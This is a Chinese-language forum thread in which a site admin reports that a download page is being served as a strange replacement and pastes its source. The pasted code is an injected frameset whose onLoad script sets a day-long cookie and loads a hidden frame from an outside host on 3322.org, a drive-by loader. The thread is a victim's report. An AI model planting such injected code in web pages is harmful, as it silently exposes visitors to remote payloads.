希望高达

今天更新了Download列表但是发现不论如何通过FTP上传覆盖，在浏览器浏览时源代码都会被改写。
现在Download.htm已经是被改写的页面了，各位不要去点击

是木马么？

starrain

啊？？我看看~

starrain

从我这边看好好的呀，Download.htm的源文件也没发现问题sm34

希望高达

http://www.srw00.com/hopegundam/Download.htm

这个页面？

源文件被改成了这样：
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://zleiuk20.3322.org:89/jav/lz002.htm";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="/hopegundam/Download.htm?UpdatedPage=aGlqYWNr">
<frame name="hi" src="">
</frameset>
</html>

starrain

君本来写的是怎样的？

希望高达

一大坨的table，一行tr对应一个下载表
上传一个最新的Download.htm

[ 本帖最后由 希望高达 于 2010-5-23 22:25 编辑 ]

starrain

奇怪，功能完全没受影响，访问也没发现有不明进程……

君看看文件大小变了没？

希望高达

从FTP上看文件大小没变，但是从浏览器访问页面，源代码就成了这个4kb的奇怪文件
你那里从浏览器上看Download.htm正常吗？

starrain

啊！现在完全正常了，连源文件也和君写的一样了。

刚才确实变成了一个简单文件……难道HTM有什么我们不明的习性sm32

starrain

安心，明天请小肥君分析一下4楼这个简单页面。

莫非是3322这个统计站点有问题？